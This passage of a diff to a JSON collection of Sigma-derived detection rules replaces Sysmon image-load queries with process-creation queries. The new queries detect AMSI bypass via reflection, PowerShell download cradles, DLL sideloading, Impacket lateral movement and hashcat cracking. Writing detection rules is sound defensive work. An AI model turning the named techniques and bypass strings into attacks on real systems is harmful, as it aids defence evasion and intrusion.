command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", - "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "status": "test", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "status": "experimental", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Windows Spooler Service Suspicious Binary Load", - "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "status": "experimental", - "description": "Detect DLL Load from Spooler Service backup folder", - "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1562.001" ], "falsepositives": [ - "Loading of legitimate driver" + "Unlikely" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_spoolsv_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." + "False positive are expected with legitimate sources" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Potential Antivirus Software DLL Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", + "status": "experimental", + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Very likely, needs more tuning" + "Scripts or tools that download files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", - "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 